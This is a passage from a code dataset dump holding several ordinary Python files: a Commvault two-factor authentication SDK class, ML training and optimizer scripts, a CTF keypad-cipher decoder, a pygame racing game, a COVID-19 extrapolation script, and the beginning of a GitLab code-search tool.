flag:\n if response.json() and 'twoFactorAuthenticationInfo' in response.json():\n info = response.json().get('twoFactorAuthenticationInfo')\n\n if 'error' in response.json() and 'errorCode' in response.json().get('error'):\n if response.json().get('error').get('errorCode') != 0:\n error_msg = response.json().get('error').get('errorString')\n raise SDKException('Security',\n '102',\n 'Failed to get the tfa info. \\nError {0}'.format(error_msg))\n\n if 'mode' in info:\n if info.get('mode') == 0:\n self._tfa_status, self._tfa_enabled_user_groups = False, []\n if info.get('mode') in (1, 2):\n self._tfa_status, self._tfa_enabled_user_groups = True, info.get('userGroups', [])\n else:\n raise SDKException('Response', '102')\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _process_response(self, flag, response):\n \"\"\"\n Processes the flag and response json\n\n Args:\n\n flag (int) -- status of api execution\n\n response (byte) -- data received from server\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to get required info\n \"\"\"\n if flag:\n if response.json():\n response_json = {}\n if 'response' in response.json():\n response_json = response.json()['response'][0]\n if 'error' in response.json():\n response_json = response.json().get('error')\n if response_json.get('errorCode') != 0:\n error_msg = response_json.get('errorString')\n raise SDKException('Security',\n '102',\n 'Failed to get the two factor authentication info.'\n ' \\nError {0}'.format(error_msg))\n self.refresh()\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def disable_tfa(self):\n \"\"\"\n Disables two factor authentication at commcell/organization level\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to disable tfa.\n \"\"\"\n url = self._services['TFA_DISABLE']\n if self._org_id:\n url = self._services['ORG_TFA_DISABLE'] % self._org_id\n flag, response = self._cvpysdk_object.make_request(\n 'PUT', url\n )\n self._process_response(flag=flag, response=response)\n\n def enable_tfa(self, user_groups=None):\n \"\"\"\n Enables two factor authentication at commcell/organization level.\n\n Args:\n user_groups (list) -- user group names on which two factor authentication needs to be enabled\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to enable tfa.\n \"\"\"\n url = self._services['TFA_ENABLE']\n\n if self._org_id:\n url = self._services['ORG_TFA_ENABLE'] % self._org_id\n\n user_groups_list = []\n if user_groups:\n if isinstance(user_groups, list):\n for group in user_groups:\n group_obj = self._commcell.user_groups.get(user_group_name=group)\n user_groups_list.append({\"userGroupName\": group_obj.name})\n else:\n raise SDKException('Security', '101')\n\n payload = {\n \"twoFactorAuthenticationInfo\": {\n \"mode\": 2 if user_groups_list else 1,\n \"userGroups\": user_groups_list\n }\n }\n\n if not self._org_id:\n payload = {\n \"commCellInfo\": {\n \"generalInfo\": payload\n }\n }\n\n flag, response = self._cvpysdk_object.make_request(\n 'PUT', url, payload\n )\n self._process_response(flag=flag, response=response)\n\n @property\n def is_tfa_enabled(self):\n \"\"\"Returns status of two factor authentication(True/False)\"\"\"\n return self._tfa_status\n\n @property\n def tfa_enabled_user_groups(self):\n \"\"\"\n Returns 
list of user group names for which two factor authentication is enabled\n eg:-\n [\n {\n \"userGroupId\": 1,\n \"userGroupName\": \"dummy\"\n }\n ]\n \"\"\"\n return self._tfa_enabled_user_groups\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/security/two_factor_authentication.py","file_name":"two_factor_authentication.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"18742540338","text":"#!/usr/bin/env python3\n\nimport numpy as np\n\n\ndef linearKernel(x1, x2):\n #LINEARKERNEL returns a linear kernel between x1 and x2\n # sim = linearKernel(x1, x2) returns a linear kernel between x1 and x2\n # and returns the value in sim\n\n # Ensure that x1 and x2 are column vectors\n x1 = x1.ravel()\n x2 = x2.ravel()\n\n # Compute the kernel\n sim = np.dot(x1, x2)\n\n return sim\n #end","repo_name":"altermarkive/machine-learning-course-by-stanford-university","sub_path":"machine-learning-ex6/ex6/linearKernel.py","file_name":"linearKernel.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36006113161","text":"#键盘密码解密\n\nchiper='999*666*88*2*777*33*6*999*4*444*777*555*333*777*444*33*66*3*7777'\nchiper=chiper.split('*')\t#用*隔开\n\nkeys=['1','2','3','4','5','6','7','8','9'] \t#有可能是q代表1,w代表2这种,修改这行即可\nvalues=[1,2,3,4,5,6,7,8,9]\ndicts=dict(zip(keys,values))\n\njiugongge=[' ','abc','def','ghi','jkl','mno','pqrs','tuv','wxyz']\nnew_dicts=dict(zip(values,jiugongge))\n\nfor i in range(len(chiper)):\n temp=dicts.get(chiper[i][0]) #temp=9,6,8,2....\n print(''.join(new_dicts[temp][len(chiper[i])-1]),end='') #先找到9对应的为wxyz,再根据999的个数取第len-1个","repo_name":"zss192/CTF-python-script","sub_path":"九键密码解密.py","file_name":"九键密码解密.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"42614057640","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nimport chainer.serializers as S\nfrom chainer import training\nfrom chainer.training import extensions\n\n# from links import communicator\nfrom links import world\n\nimport numpy as np\n\ntry:\n from tqdm import tqdm\nexcept:\n tqdm = list\n\nimport json\n\n\ndef generate(model, data, epoch=0, out='./', train=False, printer=False):\n prev_train = model.train\n model.train = False\n sentence_history, log_prob_history, canvas_history = model(\n data, generate=True)\n canvas_history = [c * 255 for c in canvas_history]\n true_image = data * 255\n model.train = prev_train\n\n def save_images(x, filename):\n x = np.array(x.tolist(), np.float32)\n width = x.shape[0]\n fig, ax = plt.subplots(1, width, figsize=(1 * width, 1)) # , dpi=20)\n for a in ax:\n a.set_xticklabels([])\n a.set_yticklabels([])\n\n for ai, xi in zip(ax.ravel(), x):\n ai.imshow(xi.reshape(28, 28), cmap='Greys_r')\n fig.savefig(filename)\n plt.clf()\n plt.close('all')\n\n save_images(true_image.data, out + str(train) + '_.png')\n if printer:\n print('save _.png')\n for i in range(model.n_turn):\n save_images(\n canvas_history[i], out + str(train) + '{}e_{}.png'.format(epoch, i))\n if printer:\n print('save {}.png'.format(i))\n for i in range(data.shape[0]):\n for log_prob_batch, word_batch_list in zip(\n log_prob_history, 
sentence_history):\n if printer:\n print(str(i) + \",\\t\",\n [int(word_batch[i]) for word_batch in word_batch_list],\n log_prob_batch[i])\n sentence_log = [[[[int(word_batch[i]) for word_batch in word_batch_list],\n float(log_prob_batch[i])]\n for log_prob_batch, word_batch_list\n in zip(log_prob_history, sentence_history)]\n for i in range(data.shape[0])]\n json_f = open(\n out + 'message.' + str(train) + '{}e.json'.format(epoch), 'w')\n json.dump(sentence_log, json_f)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=256,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=15,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu', '-g', type=int, default=-1,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--out', '-o', default='./result',\n help='Directory to output the result')\n parser.add_argument('--resume', '-r', default='',\n help='Resume the training from snapshot')\n\n parser.add_argument('--unit', '-u', type=int, default=64,\n help='Number of units')\n parser.add_argument('--image-unit', '-i', type=int, default=128,\n help='Number of middel units for image expression')\n\n parser.add_argument('--co-importance', '-importance', '-imp',\n type=float, default=0.,\n help='Coef. of importance loss')\n parser.add_argument('--co-orthogonal', '-orthogonal', '-ort',\n type=float, default=0.,\n help='Coef. of orthogonal loss')\n\n parser.add_argument('--word', '-w', type=int, default=3,\n help='Number of words in a message')\n parser.add_argument('--turn', '-t', type=int, default=3,\n help='Number of turns')\n parser.add_argument('--vocab', '-v', type=int, default=32,\n help='Number of words in vocab')\n\n parser.add_argument('--drop-ratio', '--dropout', type=float, default=0.1,\n help='dropout ratio')\n\n args = parser.parse_args()\n\n args.out = args.out.rstrip('/') + '/'\n\n import json\n print(json.dumps(args.__dict__, indent=2))\n\n print('')\n\n model = world.World(\n 28 * 28, args.image_unit, args.unit,\n n_vocab=args.vocab, n_word=args.word, n_turn=args.turn,\n drop_ratio=args.drop_ratio, co_importance=args.co_importance,\n co_orthogonal=args.co_orthogonal)\n\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current\n model.to_gpu() # Copy the model to the GPU\n\n # Setup an optimizer\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n optimizer.add_hook(chainer.optimizer.GradientClipping(1.))\n # optimizer.add_hook(chainer.optimizer.WeightDecay(0.0001))\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist(withlabel=False)\n print('# of train data:', len(train))\n print('# of test data:', len(test))\n\n import os\n if not os.path.isdir(args.out):\n if os.path.exists(args.out):\n print(args.out, 'exists as a file')\n exit()\n else:\n os.mkdir(args.out)\n\n batchsize = args.batchsize\n convert = chainer.dataset.convert.concat_examples\n log_report = extensions.LogReport()\n best_valid = 10000000.\n best_keep = 0\n print('start')\n for i_epoch in range(1, args.epoch + 1):\n n_iters = len(train) // batchsize\n permutation = np.random.permutation(len(train))\n accum_loss_data = 0.\n for i_iter in range(n_iters):\n ids = permutation[i_iter * batchsize:\n (i_iter + 1) * batchsize]\n batch = [train[idx] for idx in ids]\n batch = chainer.Variable(\n model.xp.array(convert(batch).tolist(), np.float32),\n volatile='auto')\n 
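# one ES update: clear the accumulated gradients, compute the loss on this batch, backprop, then let the optimizer apply the step\n            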
model.zerograds()\n loss = model(batch)\n loss.backward()\n optimizer.update()\n accum_loss_data += loss.data - model.sub_accum_loss\n del loss\n\n convert = chainer.dataset.convert.concat_examples\n d = convert(train[:50])\n d = chainer.Variable(\n model.xp.array(d.tolist(), np.float32), volatile='auto')\n generate(model, d, epoch=i_epoch, out=args.out, train=True,\n printer=(i_epoch == args.epoch - 1))\n\n d = convert(test[:50])\n d = chainer.Variable(\n model.xp.array(d.tolist(), np.float32), volatile='auto')\n generate(model, d, epoch=i_epoch, out=args.out, train=False,\n printer=(i_epoch == args.epoch - 1))\n del d\n\n print(i_epoch, 'loss :', accum_loss_data / n_iters)\n mean_valid_loss_data = evaluate(model, test, batchsize, convert)\n\n if mean_valid_loss_data < best_valid:\n best_valid = mean_valid_loss_data\n best_keep = 0\n S.save_npz(args.out + 'saved_model.model', model)\n print(i_epoch, 'valid:', mean_valid_loss_data, '*')\n else:\n best_keep += 1\n print(i_epoch, 'valid:', mean_valid_loss_data)\n if best_keep >= 10:\n break\n\n #S.save_npz(args.out + 'saved_model.model', model)\n print('Finish at {}/{} epoch'.format(i_epoch, args.epoch))\n\n\ndef evaluate(model, test, batchsize, convert):\n\n model.train = False\n accum_valid_loss_data = 0.\n\n for i_iter in range(len(test) // batchsize + 1):\n ids = [i_iter * batchsize + idx for idx in range(batchsize)]\n ids = [idx for idx in ids if idx < len(test)]\n batch = [test[idx]\n for idx in ids if idx < len(test)]\n if not batch:\n continue\n batch = chainer.Variable(\n model.xp.array(convert(batch).tolist(), np.float32),\n volatile='auto')\n valid_loss_data = model(batch).data\n valid_loss_data -= model.sub_accum_loss\n accum_valid_loss_data += valid_loss_data * len(ids)\n\n model.train = True\n\n return accum_valid_loss_data / len(test)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"soskek/emergence_of_language_using_discrete_sequences","sub_path":"scripts/train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"75189559413","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Union # for type hinting\nimport argparse # for type hinting\n\nimport numpy as np\nfrom numpy.random import PCG64DXSM, Generator\n\nfrom marco_polo.optimizers.uber_es.modules.opt import ESTeamWrapper as Base_TeamWrapper\nfrom marco_polo.optimizers.uber_es.modules.opt import StepStats\nfrom marco_polo.tools.stats import compute_weighted_sum\n\nfrom marco_polo.optimizers.ARS.modules.result_objects import (\n POResult,\n) # for type hinting\nfrom marco_polo.optimizers.ARS.modules.filter import Filter # for type hinting\nfrom marco_polo.tools.types import FloatArray, Role, PathString # for type hinting\nfrom marco_polo.tools.wrappers import TeamHistory # for type hinting\nfrom marco_polo.tools.iotools import NumpyDecoder\n\n\nlogger = logging.getLogger(__name__)\n\n\n################################################################################\n## Aux Objects\n################################################################################\n\n\n################################################################################\n## Main Class\n################################################################################\nclass ESTeamWrapper(Base_TeamWrapper):\n \"\"\"Wrapper for the optimizers that apply to a given team\n\n By default, the neural network models of all agents are 
updated by\n the methods in this class. However, a set of roles can be marked\n as 'frozen' to prevent the agents from being updated. This can be\n done via the parameter file using the key uber_es.freeze.\n Alternatively, the list of frozen roles can be changed later\n (see add_freeze(), remove_freeze(), and remove_all_freeze())\n \"\"\"\n\n def __init__(self, args: argparse.Namespace, team: TeamHistory) -> None:\n \"\"\"ES Team Wrapper for ARS Optimizer\n\n Parameters\n ----------\n args : argparse.Namespace\n Input arguments to parameterize Team and Optimizer\n team : TeamHistory\n Team of agents\n\n Returns\n -------\n None\n \"\"\"\n self.team = team\n self.args = args\n\n # see if freeze key is in args\n try:\n self._freeze = set(args.uber_es[\"freeze\"])\n except (AttributeError, KeyError):\n self._freeze = set()\n\n # build optimizer dict\n self.optimizers = {}\n for role in team.roles():\n self.optimizers[role] = ARS(args=args)\n\n def combine_and_update(\n self,\n step_results: list[dict[Role, POResult]],\n step_t_start: float,\n decay_noise: bool = False,\n propose_only: bool = False,\n ) -> dict[Role, StepStats]:\n \"\"\"Combine results from rollouts, pass to the optimizer, and update models.\n\n Agents with roles that are listed in the freeze set will have the statistics\n calculated but will not have their models updated.\n\n Parameters\n ----------\n step_results : list[dict[Role, POResult]]\n Results from runs\n step_t_start : float\n Time when this set of steps started (used for calculating runtime)\n decay_noise : bool, default=True\n Whether to have the applied noise decay during the optimization\n propose_only : bool, default=False\n If true, only the stats will be calculated and no updates will be made\n\n Return\n ------\n dict[Role, StepStats]\n Statistics from the runs for each role\n \"\"\"\n # return dict\n # organize by agent key\n stats = dict()\n\n # loop over agents, update their network\n for role in self.team.roles():\n # grab sim results for this agent\n results = [r[role] for r in step_results]\n\n # freeze is implemented by using propose_only\n if role in self._freeze:\n _propose_only = True\n else:\n _propose_only = propose_only\n\n # calculate stats and new theta\n new_theta, stats[role] = self.optimizers[role].combine_steps(\n step_results=results,\n theta=self.team[role].theta,\n obs_filt=self.team[role].get_obs_filt(),\n step_t_start=step_t_start,\n propose_only=_propose_only,\n )\n\n # update agent\n if not _propose_only:\n self.team[role].update_theta(new_theta=new_theta)\n self.team[role].set_model_params(model_params=new_theta)\n # obs_filt was updated in-place\n self.team[role].get_obs_filt().update_stats()\n self.team[role].get_obs_buf().reset() # should be redundent\n\n # return results\n return stats\n\n\n################################################################################\n## Optimization Controller\n################################################################################\nclass ARS:\n \"\"\"\n Augmented Random Search\n\n Algorithm V2-t from https://arxiv.org/abs/1803.07055\n \"\"\"\n\n def __init__(self, args: argparse.Namespace) -> None:\n \"\"\"\n\n\n Parameters\n ----------\n args : argparse.Namespace\n Input arguments\n\n\n Side-Effects\n ------------\n Yes\n Sets class attributes\n\n Return\n ------\n None\n \"\"\"\n #\n self.alpha = args.ARS[\"learning_rate\"] # learning-rate/step-size\n self.noise_std = args.ARS[\"noise_std\"] # std deviation of the exploration noise\n\n # check top fraction to keep, then convert 
to int for use\n assert args.ARS[\"top_frac\"] <= 1, \"top_frac must be <= 1\"\n assert args.ARS[\"top_frac\"] >= 0, \"top_frac must be >= 0\"\n self.top_frac = args.ARS[\"top_frac\"]\n self.top_n = int(\n round(\n args.ARS[\"top_frac\"]\n * args.uber_es[\"optim_jobs\"]\n * args.uber_es[\"rollouts_per_optim_job\"]\n )\n )\n\n def __str__(self) -> str:\n return \"ARS Optimization Controller\"\n\n def checkpoint(self, folder: PathString, role: Role) -> None:\n \"\"\"Save ARS Optimizer to Disk\n\n Parameters\n ----------\n folder : PathString\n Directory to store output\n role : Role\n Agent role for file naming\n\n Side-Effects\n ------------\n None\n\n Return\n ------\n None\n Saves output to disk\n \"\"\"\n with open(\n os.path.join(folder, f\"{role}_opt.json\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(self.__dict__, f)\n\n def reload(self, folder: PathString, role: Role) -> None:\n \"\"\"Load ARS Optimizer From Disk\n\n Parameters\n ----------\n folder : PathString\n Directory to read input\n role : Role\n Agent role for file naming\n\n Side-Effects\n ------------\n Yes\n Sets optimizer attributes\n\n Return\n ------\n None\n \"\"\"\n with open(\n os.path.join(folder, f\"{role}_opt.json\"), mode=\"r\", encoding=\"utf-8\"\n ) as f:\n self.__dict__ = json.load(f, cls=NumpyDecoder)\n\n def get_noise(self, seed: int, theta_len: int) -> FloatArray:\n \"\"\"Generate Random Noise for Gradient Estimation\n\n This function generates exploratory noise for simulation rollouts.\n The noise follows a standard normal distribution.\n\n Parameters\n ----------\n seed : int\n Initial value for the random generator.\n theta_len : int\n How many random numbers to return\n\n Side-Effects\n ------------\n None\n\n Return\n ------\n FloatArray\n Array of random floats of length theta\n \"\"\"\n # set random state\n random_state = Generator(PCG64DXSM(seed=seed))\n # draw normal distribution\n return random_state.normal(scale=self.noise_std, size=theta_len)\n\n def calc_max_min_theta(\n self, noise_seeds: FloatArray, returns: FloatArray, theta: FloatArray\n ) -> tuple[FloatArray, FloatArray]:\n \"\"\"\n Holdover from the original POET Code\n\n Poet calculated max/min theta values after the update, but differently from\n how it actually calculates the gradient. 
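The sign check below only decides whether the positive or the negative perturbation rollout produced the extreme return, so the reconstructed theta matches that rollout.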
I'm separating it out, adding a min,\n and then keeping it for historic purposes only.\n\n Parameters\n ----------\n noise_seeds : FloatArray\n Array of seed values used to generate the random noise\n returns : FloatArray\n Rewards values from the simulation rollouts\n theta : FloatArray\n Current parameterization of the model\n\n Side-Effects\n ------------\n None\n\n Returns\n -------\n tuple[FloatArray, FloatArray]\n Min/Max point estimates of network parameterizations\n \"\"\"\n # used for both\n theta_len = len(theta)\n retList: list[FloatArray] = []\n\n # loop over max/min\n for i in range(0, 2):\n # setup\n pos_row, neg_row = (\n returns.argmax(axis=0) if (i == 0) else returns.argmin(axis=0)\n )\n noise_sign = 1.0\n noise_seed = noise_seeds[pos_row]\n\n # check\n if returns[pos_row, 0] < returns[neg_row, 1]:\n noise_sign = -1.0\n noise_seed = noise_seeds[neg_row]\n\n # calculate\n retList.append(\n theta\n + noise_sign * self.get_noise(seed=noise_seed, theta_len=theta_len)\n )\n\n return retList[0], retList[1]\n\n def combine_steps(\n self,\n step_results: list[POResult],\n theta: FloatArray,\n obs_filt: Filter,\n step_t_start: float,\n propose_only: bool = False,\n ) -> tuple[FloatArray, StepStats]:\n \"\"\"Calculate Statistics from All Simulation Rollouts\n\n If \"propose_only\" is true, then only statistics are calculated but no\n updates are performed.\n\n\n Parameters\n ----------\n step_results : list[POResult]\n Results from the simulation rollouts\n theta : FloatArray\n Current network parameterization\n obs_filt : Filter\n The model observation filter\n step_t_start : float\n Time that this calculation started\n propose_only : bool, default=False\n Do updates or only calculate statistics?\n\n Side-Effects\n ------------\n Yes\n Updates the observation filter for the model\n\n Returns\n -------\n tuple[FloatArray, StepStats]\n Tuple containing the new network parameterization and statistics from\n the simulations\n \"\"\"\n # constants\n theta_len = len(theta)\n\n # Extract results\n nList = []\n rList = []\n lList = []\n oList = []\n for r in step_results:\n nList.append(r.noise_inds)\n rList.append(r.returns)\n lList.append(r.lengths)\n oList.append(r.obs_buf)\n\n # reshape results\n noise_inds = np.concatenate(nList)\n po_returns = np.concatenate(rList)\n po_lengths = np.concatenate(lList)\n po_obs = np.concatenate(oList)\n\n # sort and subset results\n # get max of +/- rollouts\n # partition top n - idk why the \"-\" in the kth position\n # grab just the top n\n top_n_idx = po_returns.max(axis=1).argpartition(kth=-self.top_n)[-self.top_n :]\n\n noise_inds = noise_inds[top_n_idx]\n po_returns = po_returns[top_n_idx, :]\n po_lengths = po_lengths[top_n_idx]\n po_obs = po_obs[top_n_idx]\n\n # get max/min possible grads\n # has to be after subsetting results, but before theta update\n po_theta_max, po_theta_min = self.calc_max_min_theta(\n noise_seeds=noise_inds, returns=po_returns, theta=theta\n )\n\n # calculate gradients and update theta\n ret_std = po_returns.std()\n w_sum, _ = compute_weighted_sum(\n weights=(po_returns[:, 0] - po_returns[:, 1]) / ret_std,\n vec_generator=(\n self.get_noise(seed=seed, theta_len=theta_len) for seed in noise_inds\n ),\n theta_size=theta_len,\n )\n\n # Calculate gradient\n grads = w_sum * self.alpha / self.top_n # need for logging\n\n # are we updating?\n if not propose_only:\n # update theta\n theta += grads\n\n # update observations\n for obs in po_obs:\n obs_filt.update(other=obs)\n\n # grab final time\n step_t_end = time.time()\n\n # 
return new theta and stats\n return theta, StepStats(\n po_returns_mean=po_returns.mean(),\n po_returns_median=np.median(po_returns),\n po_returns_std=po_returns.std(),\n po_returns_max=po_returns.max(),\n po_theta_max=po_theta_max,\n po_returns_min=po_returns.min(),\n po_len_mean=po_lengths.mean(),\n po_len_std=po_lengths.std(),\n noise_std=self.noise_std,\n learning_rate=self.alpha,\n theta_norm=np.square(theta).sum(),\n grad_norm=float(np.square(grads).sum()),\n update_ratio=float(0.0),\n episodes_this_step=self.top_n,\n timesteps_this_step=po_lengths.sum(),\n time_elapsed_this_step=step_t_end - step_t_start,\n )\n","repo_name":"act3-ace/marcopolo","sub_path":"marco_polo/optimizers/ARS/modules/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1476379909","text":"from os import getcwd\nimport pygame\nimport gf\nfrom os import getcwd\nfrom car import Car\nfrom speedline import Speedline\nfrom road import Background\n\n\nclass Settings():\n\n def __init__(self):\n\n self.res = (1280, 720)\n\n self.FPS = 60\n\n self.sound = getcwd()+\"\\\\music\\\\strange.mp3\"\n self.start_sound = getcwd()+\"\\\\music\\\\start.mp3\"\n\n self.chords_lines = [\n #left side (from bottom to mid)\n [-240, 720], [0, 530], [120, 520], [240, 510], [360, 500], [480, 480], [620, 470],\n #right side (from mid to bottom)\n [660, 470], [800, 480], [920, 500], [1040, 510], [1160, 520], [1280, 530], [1520, 720]\n ]\n\n self.chords_lines2 = [\n #left side (from bottom to mid)\n [0, 720], [320, 560], [380, 540], [440, 520], [500, 500], [560, 480], [620, 470],\n #right side (from mid to bottom)\n [660, 470], [700, 480], [780, 500], [840, 520], [900, 540], [960, 560], [1280, 720]\n ]\n\n self.chords_bg = [\n (0, 360), (1280, 360), (1280, 720), (0, 720)\n ]\n\n self.color_bg = (150,0,150)\n self.color_rd = (0,0,0)\n self.color_imitate_speed = (45,45,45,196)\n\nclass app(Settings):\n\n g_set = Settings()\n\n def __init__(self):\n pygame.init()\n self.screen = pygame.display.set_mode(self.g_set.res, pygame.HWSURFACE|pygame.DOUBLEBUF)\n\n self.clock = pygame.time.Clock()\n self.game = False\n\n def prepare_first_frame(self):\n pygame.mixer.music.load(self.g_set.start_sound)\n pygame.mixer.music.play()\n\n self.start_im = pygame.image.load(getcwd()+\"\\\\images\\\\mid.png\").convert()\n self.im_rect = self.start_im.get_rect()\n\n path = pygame.font.match_font('times new roman', True, True)\n font = pygame.font.Font(path, 72)\n\n return font\n\n def prepare_main_frame(self):\n\n self.car = Car(self.screen)\n self.bg = Background(self.screen, self.g_set.color_bg,\n self.g_set.color_rd, self.g_set.chords_lines,\n self.g_set.chords_lines2\n )\n\n def run(self):\n\n if not self.game:\n self.first_frame()\n if self.game:\n self.main_frame()\n\n def first_frame(self):\n tmp = 10\n color = [0, 0, 0]\n font = self.prepare_first_frame()\n\n text = font.render('W a n g a n M i d n i g h t', 50, color)\n font_rect = text.get_rect()\n\n font_rect.centerx, font_rect.centery = 640, 240\n\n while not self.game:\n self.screen.fill((0,0,0))\n self.screen.blit(self.start_im, self.im_rect)\n\n gf.check_events()\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE]:\n self.im_rect.x -= 50\n font_rect.x += 50\n\n text = font.render('W a n g a n M i d n i g h t', 50, color)\n\n if color[0] > 200: tmp = -10\n if color[0] < 50: tmp = 10\n\n for i in range(len(color)): color[i] += tmp\n\n self.screen.blit(text, 
font_rect)\n pygame.display.update()\n\n self.clock.tick(self.g_set.FPS)\n\n if font_rect.x > 1280:\n pygame.mixer.music.load(self.g_set.sound)\n pygame.mixer.music.play()\n self.game = True\n\n def main_frame(self):\n\n self.prepare_main_frame()\n chord_x = self.g_set.chords_lines[6][0]\n chord_y = self.g_set.chords_lines[6][1]\n lines = []\n\n while True:\n\n self.clock.tick(self.g_set.FPS)\n\n gf.check_events()\n\n keys = pygame.key.get_pressed()\n move = gf.check_going(keys)\n gf.check_car_turning(keys, self.car)\n\n self.bg.draw_background()\n\n gf.append_l(self.screen, lines, self.g_set.color_imitate_speed,\n self.g_set.res, chord_y, move)\n\n [line.draw_lines() for line in lines.copy()]\n\n gf.imitate_speed(lines, move)\n\n self.car.blitme()\n\n pygame.display.update()\n","repo_name":"Tr0ub1e/Wangan-Midnight","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32955117854","text":"import argparse\nimport csv\nimport datetime\nimport numpy\nimport sys\n\ndtypes = {\n 'caso.csv': [\n ('date', 'U10'),\n ('state', 'U2'),\n ('city', 'S128'),\n ('place_type','U8'),\n ('confirmed', int),\n ('deaths', int),\n ('order_for_place', int),\n ('is_last', 'U5'),\n ('estimated_population_2019', int),\n ('city_ibge_code', int),\n ('confirmed_per_100k_inhabitants', 'U32'),\n ('death_rate', 'U32')\n ]\n}\n\n\ndef cities_data(data):\n sorted_data = numpy.sort(data, order=('city', 'state'))\n\n current_city = sorted_data[0]['city']\n current_index = 0\n\n for i, entry in enumerate(sorted_data):\n if current_city != entry['city']:\n yield sorted_data[current_index:i]\n current_index = i\n current_city = entry['city']\n\n\ndef load_data(input):\n with open(input, 'r') as df:\n dtype = dtypes.get(input.split('/')[-1])\n\n if dtype:\n converters = { i: lambda x: x or 0 for i in range(len(dtype))}\n else:\n converters = 0\n\n return numpy.loadtxt(df, dtype=dtype, delimiter=',', skiprows=1, converters=converters)\n\n\ndef extrapolate_city_data(city_data, field='confirmed', prior=5, after=14, order=1):\n daystamps = [\n int(datetime.datetime.strptime(day['date'], '%Y-%m-%d').timestamp() / (24 * 3600))\n for day in city_data\n ]\n\n if len(city_data[field]) < prior:\n # not enough data\n return [], []\n\n fit = numpy.polyfit(daystamps[-prior:], city_data[field][-prior:], order)\n p = numpy.poly1d(fit)\n\n latest_date = max(daystamps)\n extra_data = [max(0, int(p(latest_date + i))) for i in range(1, after + 1)]\n utc_timestamp = lambda i: ((latest_date + i) * 24 * 3600) + 10800 # BRT +3h = UTC\n extra_days = [datetime.datetime.fromtimestamp(utc_timestamp(i)).strftime('%Y-%m-%d') for i in range(1, after + 1)]\n\n return extra_days, extra_data\n\n\ndef extrapolate(data, prior=5, after=14, order=2):\n\n extrapolated = []\n\n for city_data in cities_data(data):\n state = city_data[0]['state']\n city = city_data[0]['city']\n place_type = city_data[0]['place_type']\n order_for_place = city_data[0]['order_for_place']\n estimated_population_2019 = city_data[0]['estimated_population_2019'] or 1\n city_ibge_code = city_data[0]['city_ibge_code']\n is_last = False\n extrapolation = True\n\n days, confirmed = extrapolate_city_data(city_data, field='confirmed', prior=prior, after=after, order=order)\n days, deaths = extrapolate_city_data(city_data, field='deaths', prior=prior, after=after, order=order)\n\n if not days or not confirmed or not deaths:\n continue\n\n data = [\n 
(\n days[i], state, city.decode('latin-1'), place_type, confirmed[i], deaths[i], order_for_place,\n is_last, estimated_population_2019, city_ibge_code,\n confirmed[i] / (estimated_population_2019 / 100000), deaths[i] / confirmed[i] if confirmed[i] else 0\n )\n for i in range(after)\n ]\n\n extrapolated += data\n\n return extrapolated\n\n\ndef save(data, header_names, file_name):\n\n with open(file_name, 'w+') as f:\n writer = csv.writer(f)\n\n writer.writerow(header_names)\n for row in data:\n writer.writerow(row)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Extrapolate covid-19 data')\n parser.add_argument('input')\n parser.add_argument('output')\n parser.add_argument('--prior', type=int, default=14)\n parser.add_argument('--after', type=int, default=14)\n parser.add_argument('--order', type=int, default=2)\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_args()\n data = load_data(args.input)\n e = extrapolate(data, args.prior, args.after, args.order)\n save(e, data.dtype.names, args.output)\n","repo_name":"dpereira/es-covid19-br","sub_path":"extrapolation/extrapolate.py","file_name":"extrapolate.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"337945009","text":"#!/usr/bin/python3\nimport gitlab\nimport sys\nimport argparse\nimport re\n\ndef eprint(*args, **kwargs):\n # https://stackoverflow.com/a/14981125\n print(*args, file=sys.stderr, **kwargs)\n\ndef search(gitlab_server, token, file_filter, text, group=None, project_filter=None, api_debug=False, internal_debug=False, filename_regex=False):\n return_value = []\n \n gl = gitlab.Gitlab(gitlab_server, private_token=token)\n if api_debug:\n gl.enable_debug()\n\n filter_groups = not (group == '' or group==None)\n filter_projects = not (project_filter == '' or project_filter==None)\n\n if not filter_groups and not 